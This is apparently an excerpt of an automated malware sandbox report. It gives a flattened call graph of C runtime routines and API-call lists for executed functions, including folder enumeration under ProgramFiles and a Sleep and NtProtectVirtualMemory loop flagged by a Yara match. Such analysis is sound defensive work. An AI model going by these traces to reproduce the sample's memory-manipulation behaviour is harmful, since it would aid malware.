6685->6686 6687 22b25ede 6686->6687 6688 22b25efc InitializeCriticalSectionAndSpinCount 6687->6688 6689 22b25ee7 6687->6689 6688->6689 6690 22b22ada _ValidateLocalCookies 5 API calls 6689->6690 6691 22b25f13 6690->6691 6691->6682 7120 22b28640 7123 22b28657 7120->7123 7124 22b28665 7123->7124 7125 22b28679 7123->7125 7126 22b26368 __dosmaperr 20 API calls 7124->7126 7127 22b28693 7125->7127 7128 22b28681 7125->7128 7130 22b2866a 7126->7130 7132 22b254a7 __fassign 38 API calls 7127->7132 7135 22b28652 7127->7135 7129 22b26368 __dosmaperr 20 API calls 7128->7129 7131 22b28686 7129->7131 7133 22b262ac ___std_exception_copy 26 API calls 7130->7133 7134 22b262ac ___std_exception_copy 26 API calls 7131->7134 7132->7135 7133->7135 7134->7135 7455 22b2a1c6 IsProcessorFeaturePresent 7456 22b27bc7 7457 22b27bd3 ___scrt_is_nonwritable_in_current_image 7456->7457 7458 22b27c0a _abort 7457->7458 7464 22b25671 RtlEnterCriticalSection 7457->7464 7460 22b27be7 7461 22b27f86 __fassign 20 API calls 7460->7461 7462 22b27bf7 7461->7462 7465 22b27c10 7462->7465 7464->7460 7468 22b256b9 RtlLeaveCriticalSection 7465->7468 7467 22b27c17 7467->7458 7468->7467 7636 22b2a945 7638 22b2a96d 7636->7638 7637 22b2a9a5 7638->7637 7639 22b2a997 7638->7639 7640 22b2a99e 7638->7640 7642 22b2aa17 21 API calls 7639->7642 7645 22b2aa00 7640->7645 7644 22b2a99c 7642->7644 7646 22b2aa20 7645->7646 7647 22b2b19b __startOneArgErrorHandling 21 API calls 7646->7647 7648 22b2a9a3 7647->7648 6692 22b2508a 6693 22b250a2 6692->6693 6694 22b2509c 6692->6694 6696 22b25000 6694->6696 6697 22b2502a 6696->6697 6698 22b2500d 6696->6698 6697->6693 6699 22b25024 6698->6699 6700 22b2571e _free 20 API calls 6698->6700 6701 22b2571e _free 20 API calls 6699->6701 6700->6698 6701->6697 7649 22b25348 7650 22b23529 ___vcrt_uninitialize 8 API calls 7649->7650 7651 22b2534f 7650->7651 7652 22b27b48 7662 22b28ebf 7652->7662 7656 22b27b55 7675 22b2907c 7656->7675 7659 22b27b7f 7660 22b2571e _free 20 API calls 7659->7660 7661 22b27b8a 7660->7661 7679 22b28ec8 7662->7679 7664 22b27b50 7665 22b28fdc 7664->7665 7666 22b28fe8 ___scrt_is_nonwritable_in_current_image 7665->7666 7699 22b25671 RtlEnterCriticalSection 7666->7699 7668 22b28ff3 7669 22b2905e 7668->7669 7671 22b29032 RtlDeleteCriticalSection 7668->7671 7700 22b2a09c 7668->7700 7713 22b29073 7669->7713 7674 22b2571e _free 20 API calls 7671->7674 7672 22b2906a _abort 7672->7656 7674->7668 7676 22b29092 7675->7676 7677 22b27b64 RtlDeleteCriticalSection 7675->7677 7676->7677 7678 22b2571e _free 20 API calls 7676->7678 7677->7656 7677->7659 7678->7677 7680 22b28ed4 ___scrt_is_nonwritable_in_current_image 7679->7680 7689 22b25671 RtlEnterCriticalSection 7680->7689 7682 22b28f77 7694 22b28f97 7682->7694 7683 22b28ee3 7683->7682 7688 22b28e78 66 API calls 7683->7688 7690 22b27b94 RtlEnterCriticalSection 7683->7690 7691 22b28f6d 7683->7691 7686 22b28f83 _abort 7686->7664 7688->7683 7689->7683 7690->7683 7697 22b27ba8 RtlLeaveCriticalSection 7691->7697 7693 22b28f75 7693->7683 7698 22b256b9 RtlLeaveCriticalSection 7694->7698 7696 22b28f9e 7696->7686 7697->7693 7698->7696 7699->7668 7701 22b2a0a8 ___scrt_is_nonwritable_in_current_image 7700->7701 7702 22b2a0b9 7701->7702 7703 22b2a0ce 7701->7703 7704 22b26368 __dosmaperr 20 API calls 7702->7704 7712 22b2a0c9 _abort 7703->7712 7716 22b27b94 RtlEnterCriticalSection 7703->7716 7705 22b2a0be 7704->7705 7707 22b262ac ___std_exception_copy 26 API calls 7705->7707 7707->7712 7708 22b2a0ea 7717 22b2a026 7708->7717 7710 22b2a0f5 7733 22b2a112 7710->7733 7712->7668 7981 22b256b9 RtlLeaveCriticalSection 7713->7981 7715 22b2907a 7715->7672 7716->7708 7718 22b2a033 7717->7718 7719 22b2a048 7717->7719 7720 22b26368 __dosmaperr 20 API calls 7718->7720 7725 22b2a043 7719->7725 7736 22b28e12 7719->7736 7721 22b2a038 7720->7721 7723 22b262ac ___std_exception_copy 26 API calls 7721->7723 7723->7725 7725->7710 7726 22b2907c 20 API calls 7727 22b2a064 7726->7727 7742 22b27a5a 7727->7742 7729 22b2a06a 7749 22b2adce 7729->7749 7732 22b2571e _free 20 API calls 7732->7725 7980 22b27ba8 RtlLeaveCriticalSection 7733->7980 7735 22b2a11a 7735->7712 7737 22b28e2a 7736->7737 7741 22b28e26 7736->7741 7738 22b27a5a 26 API calls 7737->7738 7737->7741 7739 22b28e4a 7738->7739 7764 22b29a22 7739->7764 7741->7726 7743 22b27a66 7742->7743 7744 22b27a7b 7742->7744 7745 22b26368 __dosmaperr 20 API calls 7743->7745 7744->7729 7746 22b27a6b 7745->7746 7747 22b262ac ___std_exception_copy 26 API calls 7746->7747 7748 22b27a76 7747->7748 7748->7729 7750 22b2adf2 7749->7750 7751 22b2addd 7749->7751 7753 22b2ae2d 7750->7753 7758 22b2ae19 7750->7758 7752 22b26355 __dosmaperr 20 API calls 7751->7752 7755 22b2ade2 7752->7755 7754 22b26355 __dosmaperr 20 API calls 7753->7754 7756 22b2ae32 7754->7756 7757 22b26368 __dosmaperr 20 API calls 7755->7757 7759 22b26368 __dosmaperr 20 API calls 7756->7759 7760 22b2a070 7757->7760 7937 22b2ada6 7758->7937 7762 22b2ae3a 7759->7762 7760->7725 7760->7732 7763 22b262ac ___std_exception_copy 26 API calls 7762->7763 7763->7760 7765 22b29a2e ___scrt_is_nonwritable_in_current_image 7764->7765 7766 22b29a36 7765->7766 7767 22b29a4e 7765->7767 7789 22b26355 7766->7789 7769 22b29aec 7767->7769 7773 22b29a83 7767->7773 7771 22b26355 __dosmaperr 20 API calls 7769->7771 7774 22b29af1 7771->7774 7772 22b26368 __dosmaperr 20 API calls 7782 22b29a43 _abort 7772->7782 7792 22b28c7b RtlEnterCriticalSection 7773->7792 7776 22b26368 __dosmaperr 20 API calls 7774->7776 7778 22b29af9 7776->7778 7777 22b29a89 7779 22b29aa5 7777->7779 7780 22b29aba 7777->7780 7781 22b262ac ___std_exception_copy 26 API calls 7778->7781 7784 22b26368 __dosmaperr 20 API calls 7779->7784 7793 22b29b0d 7780->7793 7781->7782 7782->7741 7786 22b29aaa 7784->7786 7785 22b29ab5 7844 22b29ae4 7785->7844 7787 22b26355 __dosmaperr 20 API calls 7786->7787 7787->7785 7790 22b25b7a __dosmaperr 20 API calls 7789->7790 7791 22b2635a 7790->7791 7791->7772 7792->7777 7794 22b29b34 7793->7794 7795 22b29b3b 7793->7795 7799 22b22ada _ValidateLocalCookies 5 API calls 7794->7799 7796 22b29b5e 7795->7796 7797 22b29b3f 7795->7797 7801 22b29baf 7796->7801 7802 22b29b92 7796->7802 7798 22b26355 __dosmaperr 20 API calls 7797->7798 7800 22b29b44 7798->7800 7803 22b29d15 7799->7803 7804 22b26368 __dosmaperr 20 API calls 7800->7804 7805 22b29bc5 7801->7805 7847 22b2a00b 7801->7847 7806 22b26355 __dosmaperr 20 API calls 7802->7806 7803->7785 7808 22b29b4b 7804->7808 7850 22b296b2 7805->7850 7807 22b29b97 7806->7807 7811 22b26368 __dosmaperr 20 API calls 7807->7811 7812 22b262ac ___std_exception_copy 26 API calls 7808->7812 7814 22b29b9f 7811->7814 7812->7794 7817 22b262ac ___std_exception_copy 26 API calls 7814->7817 7815 22b29bd3 7820 22b29bd7 7815->7820 7821 22b29bf9 7815->7821 7816 22b29c0c 7818 22b29c20 7816->7818 7819 22b29c66 WriteFile 7816->7819 7817->7794 7824 22b29c56 7818->7824 7825 22b29c28 7818->7825 7822 22b29c89 GetLastError 7819->7822 7832 22b29bef 7819->7832 7828 22b29ccd 7820->7828 7857 22b29645 7820->7857 7862 22b29492 GetConsoleCP 7821->7862 7822->7832 7888 22b29728 7824->7888 7829 22b29c46 7825->7829 7830 22b29c2d 7825->7830 7828->7794 7831 22b26368 __dosmaperr 20 API calls 7828->7831 7880 22b298f5 7829->7880 7830->7828 7873 22b29807 7830->7873 7834 22b29cf2 7831->7834 7832->7794 7832->7828 7835 22b29ca9 7832->7835 7837 22b26355 __dosmaperr 20 API calls 7834->7837 7838 22b29cb0 7835->7838 7839 22b29cc4 7835->7839 7837->7794 7840 22b26368 __dosmaperr 20 API calls 7838->7840 7895 22b26332 7839->7895 7842 22b29cb5 7840->7842 7843 22b26355 __dosmaperr 20 API calls 7842->7843 7843->7794 7936 22b28c9e RtlLeaveCriticalSection 7844->7936 7846 22b29aea 7846->7782 7900 22b29f8d 7847->7900 7922 22b28dbc 7850->7922 7852 22b296c2 7853 22b296c7 7852->7853 7854 22b25af6 _abort 38 API calls 7852->7854 7853->7815 7853->7816 7855 22b296ea 7854->7855 7855->7853 7856 22b29708 GetConsoleMode 7855->7856 7856->7853 7860 22b2969f 7857->7860 7861 22b2966a 7857->7861 7858 22b2a181 WriteConsoleW CreateFileW 7858->7861 7859 22b296a1 GetLastError 7859->7860 7860->7832 7861->7858 7861->7859 7861->7860 7863 22b294f5 7862->7863 7867 22b29607 7862->7867 7863->7867 7868 22b2957b WideCharToMultiByte 7863->7868 7870 22b279e6 40 API calls __fassign 7863->7870 7872 22b295d2 WriteFile 7863->7872 7931 22b27c19 7863->7931 7864 22b22ada _ValidateLocalCookies 5 API calls 7866 22b29641 7864->7866 7866->7832 7867->7864 7868->7867 7869 22b295a1 WriteFile 7868->7869 7869->7863 7871 22b2962a GetLastError 7869->7871 7870->7863 7871->7867 7872->7863 7872->7871 7878 22b29816 7873->7878 7874 22b298d8 7875 22b22ada _ValidateLocalCookies 5 API calls 7874->7875 7877 22b298f1 7875->7877 7876 22b29894 WriteFile 7876->7878 7879 22b298da GetLastError 7876->7879 7877->7832 7878->7874 7878->7876 7879->7874 7885 22b29904 7880->7885 7881 22b29a0f 7882 22b22ada _ValidateLocalCookies 5 API calls 7881->7882 7883 22b29a1e 7882->7883 7883->7832 7884 22b29986 WideCharToMultiByte 7886 22b29a07 GetLastError 7884->7886 7887 22b299bb WriteFile 7884->7887 7885->7881 7885->7884 7885->7887 7886->7881 7887->7885 7887->7886 7889 22b29737 7888->7889 7890 22b297ea 7889->7890 7892 22b297a9 WriteFile 7889->7892 7891 22b22ada _ValidateLocalCookies 5 API calls 7890->7891 7894 22b29803 7891->7894 7892->7889 7893 22b297ec GetLastError 7892->7893 7893->7890 7894->7832 7896 22b26355 __dosmaperr 20 API calls 7895->7896 7897 22b2633d __dosmaperr 7896->7897 7898 22b26368 __dosmaperr 20 API calls 7897->7898 7899 22b26350 7898->7899 7899->7794 7909 22b28d52 7900->7909 7902 22b29f9f 7903 22b29fa7 7902->7903 7904 22b29fb8 SetFilePointerEx 7902->7904 7905 22b26368 __dosmaperr 20 API calls 7903->7905 7906 22b29fd0 GetLastError 7904->7906 7907 22b29fac 7904->7907 7905->7907 7908 22b26332 __dosmaperr 20 API calls 7906->7908 7907->7805 7908->7907 7910 22b28d5f 7909->7910 7912 22b28d74 7909->7912 7911 22b26355 __dosmaperr 20 API calls 7910->7911 7914 22b28d64 7911->7914 7913 22b26355 __dosmaperr 20 API calls 7912->7913 7915 22b28d99 7912->7915 7916 22b28da4 7913->7916 7917 22b26368 __dosmaperr 20 API calls 7914->7917 7915->7902 7918 22b26368 __dosmaperr 20 API calls 7916->7918 7919 22b28d6c 7917->7919 7920 22b28dac 7918->7920 7919->7902 7921 22b262ac ___std_exception_copy 26 API calls 7920->7921 7921->7919 7923 22b28dd6 7922->7923 7924 22b28dc9 7922->7924 7926 22b28de2 7923->7926 7927 22b26368 __dosmaperr 20 API calls 7923->7927 7925 22b26368 __dosmaperr 20 API calls 7924->7925 7928 22b28dce 7925->7928 7926->7852 7929 22b28e03 7927->7929 7928->7852 7930 22b262ac ___std_exception_copy 26 API calls 7929->7930 7930->7928 7932 22b25af6 _abort 38 API calls 7931->7932 7933 22b27c24 7932->7933 7934 22b27a00 __fassign 38 API calls 7933->7934 7935 22b27c34 7934->7935 7935->7863 7936->7846 7940 22b2ad24 7937->7940 7939 22b2adca 7939->7760 7941 22b2ad30 ___scrt_is_nonwritable_in_current_image 7940->7941 7951 22b28c7b RtlEnterCriticalSection 7941->7951 7943 22b2ad3e 7944 22b2ad70 7943->7944 7945 22b2ad65 7943->7945 7947 22b26368 __dosmaperr 20 API calls 7944->7947 7952 22b2ae4d 7945->7952 7948 22b2ad6b 7947->7948 7967 22b2ad9a 7948->7967 7950 22b2ad8d _abort 7950->7939 7951->7943 7953 22b28d52 26 API calls 7952->7953 7954 22b2ae5d 7953->7954 7955 22b2ae63 7954->7955 7956 22b2ae95 7954->7956 7958 22b28d52 26 API calls 7954->7958 7970 22b28cc1 7955->7970 7956->7955 7959 22b28d52 26 API calls 7956->7959 7961 22b2ae8c 7958->7961 7962 22b2aea1 CloseHandle 7959->7962 7964 22b28d52 26 API calls 7961->7964 7962->7955 7965 22b2aead GetLastError 7962->7965 7963 22b2aedd 7963->7948 7964->7956 7965->7955 7966 22b26332 __dosmaperr 20 API calls 7966->7963 7979 22b28c9e RtlLeaveCriticalSection 7967->7979 7969 22b2ada4 7969->7950 7971 22b28cd0 7970->7971 7972 22b28d37 7970->7972 7971->7972 7978 22b28cfa 7971->7978 7973 22b26368 __dosmaperr 20 API calls 7972->7973 7974 22b28d3c 7973->7974 7975 22b26355 __dosmaperr 20 API calls 7974->7975 7976 22b28d27 7975->7976 7976->7963 7976->7966 7977 22b28d21 SetStdHandle 7977->7976 7978->7976 7978->7977 7979->7969 7980->7735 7981->7715 6702 22b28a89 6705 22b26d60 6702->6705 6706 22b26d72 6705->6706 6707 22b26d69 6705->6707 6709 22b26c5f 6707->6709 6710 22b25af6 _abort 38 API calls 6709->6710 6711 22b26c6c 6710->6711 6729 22b26d7e 6711->6729 6713 22b26c74 6738 22b269f3 6713->6738 6716 22b26c8b 6716->6706 6719 22b26cce 6722 22b2571e _free 20 API calls 6719->6722 6722->6716 6723 22b26cc9 6724 22b26368 __dosmaperr 20 API calls 6723->6724 6724->6719 6725 22b26d12 6725->6719 6762 22b268c9 6725->6762 6726 22b26ce6 6726->6725 6727 22b2571e _free 20 API calls 6726->6727 6727->6725 6730 22b26d8a ___scrt_is_nonwritable_in_current_image 6729->6730 6731 22b25af6 _abort 38 API calls 6730->6731 6736 22b26d94 6731->6736 6733 22b26e18 _abort 6733->6713 6735 22b255a8 _abort 38 API calls 6735->6736 6736->6733 6736->6735 6737 22b2571e _free 20 API calls 6736->6737 6765 22b25671 RtlEnterCriticalSection 6736->6765 6766 22b26e0f 6736->6766 6737->6736 6770 22b254a7 6738->6770 6741 22b26a26 6743 22b26a3d 6741->6743 6744 22b26a2b GetACP 6741->6744 6742 22b26a14 GetOEMCP 6742->6743 6743->6716 6745 22b256d0 6743->6745 6744->6743 6746 22b2570e 6745->6746 6750 22b256de __dosmaperr 6745->6750 6747 22b26368 __dosmaperr 20 API calls 6746->6747 6749 22b2570c 6747->6749 6748 22b256f9 RtlAllocateHeap 6748->6749 6748->6750 6749->6719 6752 22b26e20 6749->6752 6750->6746 6750->6748 6751 22b2474f __dosmaperr 7 API calls 6750->6751 6751->6750 6753 22b269f3 40 API calls 6752->6753 6754 22b26e3f 6753->6754 6756 22b26e90 IsValidCodePage 6754->6756 6759 22b26e46 6754->6759 6760 22b26eb5 ___scrt_fastfail 6754->6760 6755 22b22ada _ValidateLocalCookies 5 API calls 6757 22b26cc1 6755->6757 6758 22b26ea2 GetCPInfo 6756->6758 6756->6759 6757->6723 6757->6726 6758->6759 6758->6760 6759->6755 6807 22b26acb GetCPInfo 6760->6807 6880 22b26886 6762->6880 6764 22b268ed 6764->6719 6765->6736 6769 22b256b9 RtlLeaveCriticalSection 6766->6769 6768 22b26e16 6768->6736 6769->6768 6771 22b254ba 6770->6771 6772 22b254c4 6770->6772 6771->6741 6771->6742 6772->6771 6773 22b25af6 _abort 38 API calls 6772->6773 6774 22b254e5 6773->6774 6778 22b27a00 6774->6778 6779 22b27a13 6778->6779 6780 22b254fe 6778->6780 6779->6780 6786 22b27f0f 6779->6786 6782 22b27a2d 6780->6782 6783 22b27a40 6782->6783 6785 22b27a55 6782->6785 6784 22b26d7e __fassign 38 API calls 6783->6784 6783->6785 6784->6785 6785->6771 6787 22b27f1b ___scrt_is_nonwritable_in_current_image 6786->6787 6788 22b25af6 _abort 38 API calls 6787->6788 6789 22b27f24 6788->6789 6790 22b27f72 _abort 6789->6790 6798 22b25671 RtlEnterCriticalSection 6789->6798 6790->6780 6792 22b27f42 6799 22b27f86 6792->6799 6797 22b255a8 _abort 38 API calls 6797->6790 6798->6792 6800 22b27f56 6799->6800 6801 22b27f94 __fassign 6799->6801 6803 22b27f75 6800->6803 6801->6800 6802 22b27cc2 __fassign 20 API calls 6801->6802 6802->6800 6806 22b256b9 RtlLeaveCriticalSection 6803->6806 6805 22b27f69 6805->6790 6805->6797 6806->6805 6813 22b26b05 6807->6813 6816 22b26baf 6807->6816 6810 22b22ada _ValidateLocalCookies 5 API calls 6812 22b26c5b 6810->6812 6812->6759 6817 22b286e4 6813->6817 6815 22b28a3e 43 API calls 6815->6816 6816->6810 6818 22b254a7 __fassign 38 API calls 6817->6818 6820 22b28704 MultiByteToWideChar 6818->6820 6821 22b28742 6820->6821 6822 22b287da 6820->6822 6824 22b256d0 21 API calls 6821->6824 6827 22b28763 ___scrt_fastfail 6821->6827 6823 22b22ada _ValidateLocalCookies 5 API calls 6822->6823 6825 22b26b66 6823->6825 6824->6827 6831 22b28a3e 6825->6831 6826 22b287d4 6836 22b28801 6826->6836 6827->6826 6829 22b287a8 MultiByteToWideChar 6827->6829 6829->6826 6830 22b287c4 GetStringTypeW 6829->6830 6830->6826 6832 22b254a7 __fassign 38 API calls 6831->6832 6833 22b28a51 6832->6833 6840 22b28821 6833->6840 6837 22b2881e 6836->6837 6838 22b2880d 6836->6838 6837->6822 6838->6837 6839 22b2571e _free 20 API calls 6838->6839 6839->6837 6841 22b2883c 6840->6841 6842 22b28862 MultiByteToWideChar 6841->6842 6843 22b28a16 6842->6843 6844 22b2888c 6842->6844 6845 22b22ada _ValidateLocalCookies 5 API calls 6843->6845 6847 22b256d0 21 API calls 6844->6847 6850 22b288ad 6844->6850 6846 22b26b87 6845->6846 6846->6815 6847->6850 6848 22b288f6 MultiByteToWideChar 6849 22b28962 6848->6849 6851 22b2890f 6848->6851 6853 22b28801 __freea 20 API calls 6849->6853 6850->6848 6850->6849 6867 22b25f19 6851->6867 6853->6843 6855 22b28971 6857 22b256d0 21 API calls 6855->6857 6862 22b28992 6855->6862 6856 22b28939 6856->6849 6859 22b25f19 11 API calls 6856->6859 6857->6862 6858 22b28a07 6861 22b28801 __freea 20 API calls 6858->6861 6859->6849 6860 22b25f19 11 API calls 6863 22b289e6 6860->6863 6861->6849 6862->6858 6862->6860 6863->6858 6864 22b289f5 WideCharToMultiByte 6863->6864 6864->6858 6865 22b28a35 6864->6865 6866 22b28801 __freea 20 API calls 6865->6866 6866->6849 6868 22b25c45 __dosmaperr 5 API calls 6867->6868 6869 22b25f40 6868->6869 6873 22b25f49 6869->6873 6875 22b25fa1 6869->6875 6872 22b22ada _ValidateLocalCookies 5 API calls 6874 22b25f9b 6872->6874 6873->6872 6874->6849 6874->6855 6874->6856 6876 22b25c45 __dosmaperr 5 API calls 6875->6876 6877 22b25fc8 6876->6877 6878 22b22ada _ValidateLocalCookies 5 API calls 6877->6878 6879 22b25f89 LCMapStringW 6878->6879 6879->6873 6881 22b26892 ___scrt_is_nonwritable_in_current_image 6880->6881 6888 22b25671 RtlEnterCriticalSection 6881->6888 6883 22b2689c 6889 22b268f1 6883->6889 6887 22b268b5 _abort 6887->6764 6888->6883 6901 22b27011 6889->6901 6891 22b2693f 6892 22b27011 26 API calls 6891->6892 6893 22b2695b 6892->6893 6894 22b27011 26 API calls 6893->6894 6895 22b26979 6894->6895 6896 22b268a9 6895->6896 6897 22b2571e _free 20 API calls 6895->6897 6898 22b268bd 6896->6898 6897->6896 6915 22b256b9 RtlLeaveCriticalSection 6898->6915 6900 22b268c7 6900->6887 6902 22b27022 6901->6902 6906 22b2701e 6901->6906 6903 22b27029 6902->6903 6907 22b2703c ___scrt_fastfail 6902->6907 6904 22b26368 __dosmaperr 20 API calls 6903->6904 6905 22b2702e 6904->6905 6908 22b262ac ___std_exception_copy 26 API calls 6905->6908 6906->6891 6907->6906 6909 22b2706a 6907->6909 6911 22b27073 6907->6911 6908->6906 6910 22b26368 __dosmaperr 20 API calls 6909->6910 6912 22b2706f 6910->6912 6911->6906 6913 22b26368 __dosmaperr 20 API calls 6911->6913 6914 22b262ac ___std_exception_copy 26 API calls 6912->6914 6913->6912 6914->6906 6915->6900 7136 22b22049 7138 22b22055 ___scrt_is_nonwritable_in_current_image 7136->7138 7137 22b2205e 7138->7137 7139 22b220d3 7138->7139 7140 22b2207d 7138->7140 7171 22b22639 IsProcessorFeaturePresent 7139->7171 7150 22b2244c 7140->7150 7143 22b220da 7144 22b22082 7159 22b22308 7144->7159 7146 22b22087 __RTC_Initialize 7162 22b220c4 7146->7162 7148 22b2209f 7165 22b2260b 7148->7165 7151 22b22451 ___scrt_release_startup_lock 7150->7151 7152 22b22455 7151->7152 7155 22b22461 7151->7155 7153 22b2527a _abort 20 API calls 7152->7153 7154 22b2245f 7153->7154 7154->7144 7156 22b2246e 7155->7156 7157 22b2499b _abort 28 API calls 7155->7157 7156->7144 7158 22b24bbd 7157->7158 7158->7144 7175 22b234c7 RtlInterlockedFlushSList 7159->7175 7161 22b22312 7161->7146 7177 22b2246f 7162->7177 7164 22b220c9 ___scrt_release_startup_lock 7164->7148 7166 22b22617 7165->7166 7170 22b2262d 7166->7170 7205 22b253ed 7166->7205 7170->7137 7172 22b2264e ___scrt_fastfail 7171->7172 7173 22b226f9 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 7172->7173 7174 22b22744 ___scrt_fastfail 7173->7174 7174->7143 7176 22b234d7 7175->7176 7176->7161 7182 22b253ff 7177->7182 7189 22b25c2b 7182->7189 7185 22b2391b 7186 22b2354d 7185->7186 7187 22b23925 7185->7187 7186->7164 7200 22b23b2c 7187->7200 7190 22b25c35 7189->7190 7192 22b22476 7189->7192 7193 22b25db2 7190->7193 7192->7185 7194 22b25c45 __dosmaperr 5 API calls 7193->7194 7195 22b25dd9 7194->7195 7196 22b25df1 TlsFree 7195->7196 7197 22b25de5 7195->7197 7196->7197 7198 22b22ada _ValidateLocalCookies 5 API calls 7197->7198 7199 22b25e02 7198->7199 7199->7192 7201 22b23a82 try_get_function 5 API calls 7200->7201 7202 22b23b46 7201->7202 7203 22b23b5e TlsFree 7202->7203 7204 22b23b52 7202->7204 7203->7204 7204->7186 7216 22b274da 7205->7216 7208 22b23529 7209 22b23532 7208->7209 7210 22b23543 7208->7210 7211 22b2391b ___vcrt_uninitialize_ptd 6 API calls 7209->7211 7210->7170 7212 22b23537 7211->7212 7220 22b23972 7212->7220 7217 22b274f3 7216->7217 7218 22b22ada _ValidateLocalCookies 5 API calls 7217->7218 7219 22b22625 7218->7219 7219->7208 7221 22b2353c 7220->7221 7222 22b2397d 7220->7222 7224 22b23c50 7221->7224 7223 22b23987 RtlDeleteCriticalSection 7222->7223 7223->7221 7223->7223 7225 22b23c7f 7224->7225 7226 22b23c59 7224->7226 7225->7210 7226->7225 7227 22b23c69 FreeLibrary 7226->7227 7227->7226 7228 22b2724e GetProcessHeap 7229 22b2284f 7230 22b22882 std::exception::exception 27 API calls 7229->7230 7231 22b2285d 7230->7231 7019 22b2220c 7020 22b22215 7019->7020 7021 22b2221a dllmain_dispatch 7019->7021 7023 22b222b1 7020->7023 7024 22b222c7 7023->7024 7026 22b222d0 7024->7026 7027 22b22264 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 7024->7027 7026->7021 7027->7026

                                          Executed Functions

                                          Function 22B210F1 Relevance: 12.1, APIs: 8, Instructions: 88stringfileCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          APIs
                                          • lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 22B21137
                                          • lstrcatW.KERNEL32(?,?), ref: 22B21151
                                          • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 22B2115C
                                          • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 22B2116D
                                          • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 22B2117C
                                          • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 22B21193
                                          • FindNextFileW.KERNELBASE(00000000,00000010), ref: 22B211D0
                                          • FindClose.KERNEL32(00000000), ref: 22B211DB
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.2264361313.0000000022B21000.00000040.00001000.00020000.00000000.sdmp, Offset: 22B20000, based on PE: true
                                          • Associated: 0000000A.00000002.2264341426.0000000022B20000.00000004.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000A.00000002.2264361313.0000000022B36000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_22b20000_wab.jbxd
                                          Similarity
                                          • API ID: lstrlen$Find$File$CloseFirstNextlstrcat
                                          • String ID:
                                          • API String ID: 1083526818-0
                                          • Opcode ID: c440ce8b5ee44626e15523960ec62d9f868a0d6bba878176006a6699db343d99
                                          • Instruction ID: 5aeceb23db4fd6fbd8d46c460a51131a4f1402d25e72ff771aecf208b0d89713
                                          • Opcode Fuzzy Hash: c440ce8b5ee44626e15523960ec62d9f868a0d6bba878176006a6699db343d99
                                          • Instruction Fuzzy Hash: DB2106719443096BC710EBA49C48F8B7BDCEF84315F000E2AFA58D30A0E774D244C796
                                          Function 04586E09 Relevance: 3.1, APIs: 2, Instructions: 61sleepnativeCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 54 4586e09-4586e4f 55 4586e54-4586e6a call 4586792 54->55 57 4586e6c 55->57 58 4586e71-4586e80 55->58 57->58 59 4586e92-4586eaa 58->59 60 4586e82-4586e8d Sleep 58->60 61 4586ecd-4586ef1 NtProtectVirtualMemory call 4586792 59->61 60->54 63 4586ef6-4586f04 61->63 63->54
                                          APIs
                                          • Sleep.KERNEL32(00000005), ref: 04586E87
                                          • NtProtectVirtualMemory.NTDLL(000000FF,-0000101C,-00000018), ref: 04586EEE
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.2247528936.0000000003BCD000.00000040.00000400.00020000.00000000.sdmp, Offset: 03BCD000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_3bcd000_wab.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: MemoryProtectSleepVirtual
                                          • String ID:
                                          • API String ID: 3235210055-0
                                          • Opcode ID: 6f33c8518c956537a747774fd4ed3a71e5b7b2fd7c6f9fd96884927f089bfad1
                                          • Instruction ID: 624b1d28a85eb53cf2ccd623821ed340cd50b568839add0350d88364a61a3421
                                          • Opcode Fuzzy Hash: 6f33c8518c956537a747774fd4ed3a71e5b7b2fd7c6f9fd96884927f089bfad1
                                          • Instruction Fuzzy Hash: 151159716107019FEB04BE34C88C78BB3A5BF103B4F978149AC61AB4E6DB64D4C18F12
                                          Function 22B212EE Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 243stringCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          APIs
                                          • GetEnvironmentVariableW.KERNEL32(ProgramFiles,?,00000104), ref: 22B21434
                                            • Part of subcall function 22B210F1: lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 22B21137
                                            • Part of subcall function 22B210F1: lstrcatW.KERNEL32(?,?), ref: 22B21151
                                            • Part of subcall function 22B210F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 22B2115C
                                            • Part of subcall function 22B210F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 22B2116D
                                            • Part of subcall function 22B210F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 22B2117C
                                            • Part of subcall function 22B210F1: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 22B21193
                                            • Part of subcall function 22B210F1: FindNextFileW.KERNELBASE(00000000,00000010), ref: 22B211D0
                                            • Part of subcall function 22B210F1: FindClose.KERNEL32(00000000), ref: 22B211DB
                                          • lstrlenW.KERNEL32(?), ref: 22B214C5
                                          • lstrlenW.KERNEL32(?), ref: 22B214E0
                                          • lstrlenW.KERNEL32(?,?), ref: 22B2150F
                                          • lstrcatW.KERNEL32(00000000), ref: 22B21521
                                          • lstrlenW.KERNEL32(?,?), ref: 22B21547
                                          • lstrcatW.KERNEL32(00000000), ref: 22B21553
                                          • lstrlenW.KERNEL32(?,?), ref: 22B21579
                                          • lstrcatW.KERNEL32(00000000), ref: 22B21585
                                          • lstrlenW.KERNEL32(?,?), ref: 22B215AB
                                          • lstrcatW.KERNEL32(00000000), ref: 22B215B7
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.2264361313.0000000022B21000.00000040.00001000.00020000.00000000.sdmp, Offset: 22B20000, based on PE: true
